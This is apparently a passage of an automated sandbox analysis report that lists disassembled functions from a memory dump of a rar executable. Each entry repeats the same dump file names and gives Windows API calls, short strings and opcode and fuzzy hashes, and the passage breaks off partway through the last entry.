                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 932687459-0
                                                                                                                                                                      • Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                      • Instruction ID: 31ea00cdedff810ede2af6281178ed4def28c0db4c12950585a535f56cca9e1c
                                                                                                                                                                      • Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                      • Instruction Fuzzy Hash: 24419651A0DAD285FB59AB28D1507BEB390EB90B88FD84533DF4D06699DF2CD4478334
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A25120 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4141327611-0
                                                                                                                                                                      • Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                      • Instruction ID: 4a03af3793ef3197a5b8f6da0da9415159e4a401abecac473e4c2c13b3826ba4
                                                                                                                                                                      • Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                      • Instruction Fuzzy Hash: A141A222A0D78246FB6DBB589041B7DE690BFD1B94FD45172DE4866AC5CF3CE8438720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A2978C Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7D7A23CEF,?,?,00000000,00007FF7D7A23CAA,?,?,00000000,00007FF7D7A23FD9), ref: 00007FF7D7A297A5
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7D7A23CEF,?,?,00000000,00007FF7D7A23CAA,?,?,00000000,00007FF7D7A23FD9), ref: 00007FF7D7A29807
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7D7A23CEF,?,?,00000000,00007FF7D7A23CAA,?,?,00000000,00007FF7D7A23FD9), ref: 00007FF7D7A29841
                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7D7A23CEF,?,?,00000000,00007FF7D7A23CAA,?,?,00000000,00007FF7D7A23FD9), ref: 00007FF7D7A2986B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1557788787-0
                                                                                                                                                                      • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                      • Instruction ID: dd8e76bf1ce2a771cd6de05c28fd2093af3220f8e6a347f023f1117dbca0c397
                                                                                                                                                                      • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                      • Instruction Fuzzy Hash: C3218121E0875181E628AF1AA44092EE6A4FB94FD0FCC5136DE9E33BA4DF3CE4538714
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A0B4EC Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentPriorityThread$ClassProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1171435874-0
                                                                                                                                                                      • Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                      • Instruction ID: 6ddd54cad938b403863d9e734666930755ad69ad25f1540e5f929769cf9fa3be
                                                                                                                                                                      • Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                      • Instruction Fuzzy Hash: AF118631E0864287E668AB28DA84A7DA251EFC4745FE00877C70F27688DF2CBC474720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A25630 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$abort
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1447195878-0
                                                                                                                                                                      • Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                      • Instruction ID: 63104cdde70d50aa42a66bb0254160328e634fb8d5ce71dc275214e7fc117492
                                                                                                                                                                      • Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                      • Instruction Fuzzy Hash: 13018010B0960343FA5C777D965693DD192AFC8788FC82537D91E267D2ED2DA8034235
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A258A4 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: gfffffff
                                                                                                                                                                      • API String ID: 3215553584-1523873471
                                                                                                                                                                      • Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                      • Instruction ID: 004ed4949269af8a0df422791c2d2a8c982114f8e306b18d9a66f774a8898526
                                                                                                                                                                      • Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                      • Instruction Fuzzy Hash: 58916962B093C646EB199F2D9186B7CAB95BBA17D4F849172CA8D07391EA3CE503C311
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A1F7CC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: *
                                                                                                                                                                      • API String ID: 3215553584-163128923
                                                                                                                                                                      • Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                      • Instruction ID: c9d45c3d21dc9c0364cd24b756b47dec993dfe2775593bbe34a48ab8e545e627
                                                                                                                                                                      • Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                      • Instruction Fuzzy Hash: 0171627290A69286F76CAF2C804147CBBA0FB85F58FD41137DE4A52299DF38D482C731
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79F4534 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF7D79E475B,?,00000000,?,?,00007FF7D79E4620,?,00000000,?), ref: 00007FF7D79F4633
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                                      • String ID: UNC$\\?\
                                                                                                                                                                      • API String ID: 1611563598-253988292
                                                                                                                                                                      • Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                      • Instruction ID: 007b7d8c59441c129a9617d55d9e0726dede01fd7fe762d40a70ceba5c958aca
                                                                                                                                                                      • Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C41D543A08A8341EA24BB69E4015BDE351AF857D8FC18533EE5D476EAEE2CF547C320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79D4888 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LoadString$fflushswprintf
                                                                                                                                                                      • String ID: %d.%02d$[
                                                                                                                                                                      • API String ID: 1946543793-195111373
                                                                                                                                                                      • Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                                                                                                                                      • Instruction ID: 0b5f577b205eada7679c26e96a2c91f71b2281a4decada23e5cc0d04d3a9ce12
                                                                                                                                                                      • Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F31B312A0958341FB54FB29E459BBDA351AF85788FC8043BEA4D0B6D7DF2CE046C720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79FF474 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                      • String ID: fixed%u.$fixed.
                                                                                                                                                                      • API String ID: 233258989-2525383582
                                                                                                                                                                      • Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                      • Instruction ID: 7d03eb1738d39f2bc484e97e8ef119f785dd4dce05f713606af881596dc8ea0e
                                                                                                                                                                      • Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                      • Instruction Fuzzy Hash: 21318423A0868292EB10BB65E4017EDE760EB85794FD04133EA5D176AADE3CD547CB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E331C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF7D79F42CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7D79F430F
                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,00007FF7D79E0BED,?,?,00000000,?,?,00007FF7D79DF30F,00000000,00007FF7D79C6380,?,00007FF7D79C2EC8), ref: 00007FF7D79E337E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InformationVolumeswprintf
                                                                                                                                                                      • String ID: FAT$FAT32
                                                                                                                                                                      • API String ID: 989755765-1174603449
                                                                                                                                                                      • Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                                                                                                                                      • Instruction ID: f27d91d25fe4c6118a33a3438e58f60d4cc437b46a8110fda37e438b328deeab
                                                                                                                                                                      • Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
